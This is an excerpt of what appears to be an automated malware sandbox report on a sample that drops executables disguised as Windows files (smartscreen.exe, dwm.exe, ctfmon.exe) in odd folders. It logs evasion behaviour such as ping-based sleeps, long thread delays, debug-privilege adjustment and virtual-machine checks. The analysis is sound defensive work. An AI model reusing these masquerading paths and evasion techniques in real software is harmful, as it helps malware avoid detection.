                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Uses ping.exe to sleep
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeMemory allocated: F20000 memory reserve | memory write watchJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeMemory allocated: 1AC70000 memory reserve | memory write watchJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeMemory allocated: 11E0000 memory reserve | memory write watch
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeMemory allocated: 1AB40000 memory reserve | memory write watch
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeMemory allocated: 2C90000 memory reserve | memory write watch
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeMemory allocated: 1AEA0000 memory reserve | memory write watch
                                    Source: C:\Recovery\dwm.exeMemory allocated: 14E0000 memory reserve | memory write watch
                                    Source: C:\Recovery\dwm.exeMemory allocated: 1B220000 memory reserve | memory write watch
                                    Source: C:\Recovery\dwm.exeMemory allocated: DA0000 memory reserve | memory write watch
                                    Source: C:\Recovery\dwm.exeMemory allocated: 1AA90000 memory reserve | memory write watch
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeMemory allocated: AE0000 memory reserve | memory write watch
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeMemory allocated: 1A4E0000 memory reserve | memory write watch
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeMemory allocated: 14F0000 memory reserve | memory write watch
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeMemory allocated: 1B450000 memory reserve | memory write watch
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeMemory allocated: 9E0000 memory reserve | memory write watch
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeMemory allocated: 1A380000 memory reserve | memory write watch
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeMemory allocated: 8E0000 memory reserve | memory write watch
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeMemory allocated: 1A590000 memory reserve | memory write watch
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeMemory allocated: 1870000 memory reserve | memory write watch
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeMemory allocated: 1B330000 memory reserve | memory write watch
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeMemory allocated: 2B50000 memory reserve | memory write watch
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeMemory allocated: 1AD80000 memory reserve | memory write watch
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeMemory allocated: F50000 memory reserve | memory write watch
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeMemory allocated: 1AB00000 memory reserve | memory write watch
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeMemory allocated: BB0000 memory reserve | memory write watch
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeMemory allocated: 1A660000 memory reserve | memory write watch
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9BB23688 sldt word ptr [eax]7_2_00007FFD9BB23688
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\dwm.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\dwm.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\kwWqKlvO.logJump to dropped file
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeDropped PE file which has not been started: C:\Users\user\Desktop\etRRuFlx.logJump to dropped file
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe TID: 8100Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exe TID: 4852Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exe TID: 3400Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\dwm.exe TID: 3448Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\dwm.exe TID: 7928Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe TID: 7936Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe TID: 5788Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe TID: 5220Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe TID: 7964Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe TID: 4040Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe TID: 6296Thread sleep time: -30000s >= -30000s
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe TID: 7976Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe TID: 6776Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe TID: 6900Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\dwm.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\dwm.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0042A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0042A69B
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0043C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0043C220
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0043E6A3 VirtualQuery,GetSystemInfo,0_2_0043E6A3
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\dwm.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\dwm.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: smartscreen.exe, 0000002A.00000002.2142062522.000000001B68F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: wscript.exe, 00000001.00000003.1965549771.0000000000832000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}j
                                    Source: smartscreen.exe, 0000002A.00000002.2142062522.000000001B68F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: wscript.exe, 00000001.00000003.1965549771.0000000000832000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: EjS7Q5fFCE.exe, dwm.exe.7.dr, smartscreen.exe.7.dr, ctfmon.exe.7.dr, iEIWJugOSvvEyboGDFYpQ.exe0.7.dr, iEIWJugOSvvEyboGDFYpQ.exe.7.dr, Portsessionsvc.exe.0.drBinary or memory string: OiukpR2FK10qHGfSk19T
                                    Source: smartscreen.exe, 0000002A.00000002.2127592575.0000000000FB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeAPI call chain: ExitProcess graph end nodegraph_0-24906
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0043F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043F838
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_00447DEE mov eax, dword ptr fs:[00000030h]0_2_00447DEE
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0044C030 GetProcessHeap,0_2_0044C030
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess token adjusted: Debug
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\dwm.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\dwm.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess token adjusted: Debug
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess token adjusted: Debug
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess token adjusted: Debug
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess token adjusted: Debug
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0043F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043F838
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0043F9D5 SetUnhandledExceptionFilter,0_2_0043F9D5
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0043FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0043FBCA
